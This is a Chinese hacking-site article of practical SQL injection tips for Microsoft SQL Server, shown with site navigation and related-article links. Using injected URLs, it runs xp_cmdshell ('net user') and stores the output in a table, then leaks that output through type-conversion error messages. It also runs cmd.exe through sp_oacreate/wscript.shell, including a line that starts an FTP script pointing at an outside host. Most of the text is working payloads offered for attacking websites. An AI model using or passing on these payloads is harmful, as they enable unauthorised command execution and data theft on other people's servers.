Your Ad Here
首页 | 编程语言 | 网站建设 | 游戏天堂 | 冲浪宝典 | 网络安全 | 操作系统 | 软件时空 | 硬件指南 | 病毒相关 | IT 认证
软讯网络 > 网络安全 > 黑客技术 > 注入技巧手记
【标  题】:注入技巧手记
【关键字】:技巧,注入
【来  源】:网络

注入技巧手记

Your Ad Here 1.显示cmd执行的回显.

在注入是sa权限时,看不到命令的回显时件很痛苦的事情,在小竹兄的nbsi里也有一个尝试回显,可为什么要尝试了?

下面我说一种方法,绝对对可看到回显,不知道小竹兄用的是什么方法哦

建立表
语句:http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000));--
返回:正常的信息!说明建表成功!继续!
语句:http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_cmdshell 'net user' ;--

返回:正常信息。应该写入dirs数据正常

语句:http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs);--

返回:Microsoft OLE DB Provider for SQL Server 错误 80040e07
将 varchar 值 '***'转换为数据类型为 int 的列时发生语法错误。
^_^,这样我们就看到回显的结果了,当然,直接用nbsi暴表里的内容将更快速.

同理 ,其它的扩展也可以用这种方法得到内容哦,比如regread,(没有测试)

2. xp_dirtree写路径的问题

nbsi的目录列表工具不是很好用,有时候显示列不出来,实际上是出来了的哦,你直接暴表的数据(默认是NB_TreeList_Tmp)就看到内容了.

3.检测漏洞存在

nbsi的漏洞检测功能实在不敢恭维,对于写的像数字型的字符他都拒绝检测,就更不用说过滤了引号的类型了,所以还是建议手工检测,这样保证万无一失(:P)

4.删除xpsql70.dll和xp_cmdshell,and无法上传的问题解决

实际上很早以前czy大哥已经说过了,记得lzy好像也说过一个,不过和这个好像不一样

declare @s int
exec sp_oacreate "wscript.shell",@s out
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo open asp.7i24.com>c:\a.txt"

这个是在查询分析器里执行的,直接在地址栏里应该也是可以执行的,像这样

declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo aaa >c:\a.txt"

具体的没有在注入点测试
饶过脚本检测上传网页木马:【上一篇】
M**2 Trojan的完全修改—脱壳+特征码修改+PEDIY:【下一篇】
【相关文章】
  • PHP+MySQL注入导出文件的新发现(附带IPB2的漏洞利用)
  • 提升权限终极技巧
  • 一些技巧性的东西
  • 标准注入语句 上
  • 标准注入语句 下
  • 用Winsock实现对网站数据库的数据注入
  • wu-ftpd小技巧
  • 在肉鸡上发现的SQL注入网页形式版
  • nc.exe高级技巧应用汇总
  • php注入实例
  • 【随机文章】
  • 如何用C#创建Windows Service
  • lint翻译为"长整数" --<<C专家编程>>中一个老鼠坏锅汤的一句话
  • Ms IIS 5.1 FAT/FAT32 文件系统网页源码泄露漏洞
  • 通过IP Filter实现FreeBSD防火墙
  • Vista themes for SLED 10 Beryl Download
  • php的安全配置
  • man ipfw(8)
  • 一个用session实现微型购物篮的例子
  • c#中实现多线程
  • Oracle企业管理器完全参考
  • 【相关评论】
    没有相关评论
    【发表评论】
    姓名:
    邮件:
    随机码*
    评论*
          
    |  首 页  |  版权声明  |  联系我们   |  网站地图  |
    CopyRight © 2004-2007 软讯网络 All Rigths Reserved.